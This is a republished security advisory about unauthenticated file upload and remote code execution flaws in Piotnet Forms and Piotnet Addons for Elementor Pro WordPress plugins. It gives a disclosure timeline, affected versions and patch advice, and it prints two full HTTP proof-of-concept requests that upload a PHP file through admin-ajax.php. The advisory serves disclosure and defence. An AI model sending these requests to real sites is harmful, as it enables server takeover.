HaBangNet

×
×

News: High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins

Published: 21/10/2021 Back

Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:



  1. Piotnet Vulnerabilities: Summary and Timeline

  2. Piotnet Vulnerabilities Details

  3. Recommendations

  4. Recommended articles


Piotnet Vulnerabilities: Summary and Timeline


Piotnet vulnerabilities: Summary and Timeline


On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.


Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360. 


The Piotnet developers were provided with a detailed report on July 7, 2021, and followed up with PoC and recommendations on August 25, 2021. Since there were no updates from developers, the Wordpress.org plugins team was informed about a vulnerable free plugin version available on https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021, as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.


Finally, on October 13, 2021, Pitonet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).


 


Piotnet Vulnerabilities DetailsPiotnet Vulnerabilities Details


Description: Unauthenticated File Upload and RCE in Piotnet Forms


Affected Plugin: Piotnet Forms


Affected Versions: <= 1.0.22


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 1.0.23


 


Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro


Affected Plugin: Piotnet Forms Pro


Affected Versions: <=1.1.13  


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 1.1.14


 


For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:









piotnetforms_ajax_form_builder



 


Vulnerable file:









inc/forms/ajax-form-builder.php



 


The function is allowed for non-authenticated users:


The function is allowed for non-authenticated users ajax piotnet forms


Furthermore, there is no validation for parameters required by this function like post_id and form_id, and for an attack to be successful the parameters just should be transferred.


Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload different extension files and execute them further.


piotnet vulnerability codeFinally, although the file name is generated randomly, /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.


 


PoC:


 









POST /wp-admin/admin-ajax.php HTTP/1.1


Host: vuln_domain.com


Accept: */*


Accept-Language: en-US,en;q=0.5


Accept-Encoding: gzip, deflate


X-Requested-With: XMLHttpRequest


Content-Type: multipart/form-data; boundary=--------205816383


Content-Length: 645


Origin: http://vuln_domain.com


Connection: close


----------205816383


Content-Disposition: form-data; name="action"


piotnetforms_ajax_form_builder


----------205816383


Content-Disposition: form-data; name="post_id"


11111


----------205816383


Content-Disposition: form-data; name="form_id"


d253bdb1


----------205816383


Content-Disposition: form-data; name="fields"


[]


----------205816383


Content-Disposition: form-data; name="referrer"


http://domain.com/?page_id=2


----------205816383


Content-Disposition: form-data; name="file[]"; filename="file.php"


Content-Type: application/octet-stream



echo("PoC for vulnerability is confirmed");


?>


----------205816383--






Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro


Affected Plugin: Piotnet Addons for Elementor Pro


Affected Versions: <=6.4.11 


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 6.4.12


 


For Piotnet Addons For Elementor Pro, the case is quite similar, except the function name is pafe_ajax_form_builder and the uploads directory in /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.


 


PoC:


 









POST /wp-admin/admin-ajax.php HTTP/1.1


Host: vuln_domain.com


Accept: */*


Accept-Language: en-US,en;q=0.5


Accept-Encoding: gzip, deflate


X-Requested-With: XMLHttpRequest


Content-Type: multipart/form-data; boundary=--------205816383


Content-Length: 645


Origin: http://vuln_domain.com


Connection: close


----------205816383


Content-Disposition: form-data; name="action"


pafe_ajax_form_builder


----------205816383


Content-Disposition: form-data; name="post_id"


11111


----------205816383


Content-Disposition: form-data; name="form_id"


d253bdb1


----------205816383


Content-Disposition: form-data; name="fields"


[]


----------205816383


Content-Disposition: form-data; name="referrer"


http://domain.com/?page_id=2


----------205816383


Content-Disposition: form-data; name="file[]"; filename="file.php"


Content-Type: application/octet-stream



echo("PoC for vulnerability is confirmed");


?>


----------205816383--



 


Recommendations


piotnet forms addons vulnerability recommendations


To protect your servers from vulnerabilities exploitation we strongly recommend:



  • Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.

  • Updating your Piotnet plugins to the latest versions.


Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.


Make your servers secure now!


 

 More information refer to https://blog.imunify360.com/high-severity-vulnerabilities-in-piotnet-forms-free/pro-and-piotnet-addons-for-elementor-pro-plugins?utm_campaign=Imunify360%20Blog&utm_content=183953951&utm_medium=social&utm_source=twitter&hss_channel=tw-775448843206860800


Powered by HostBill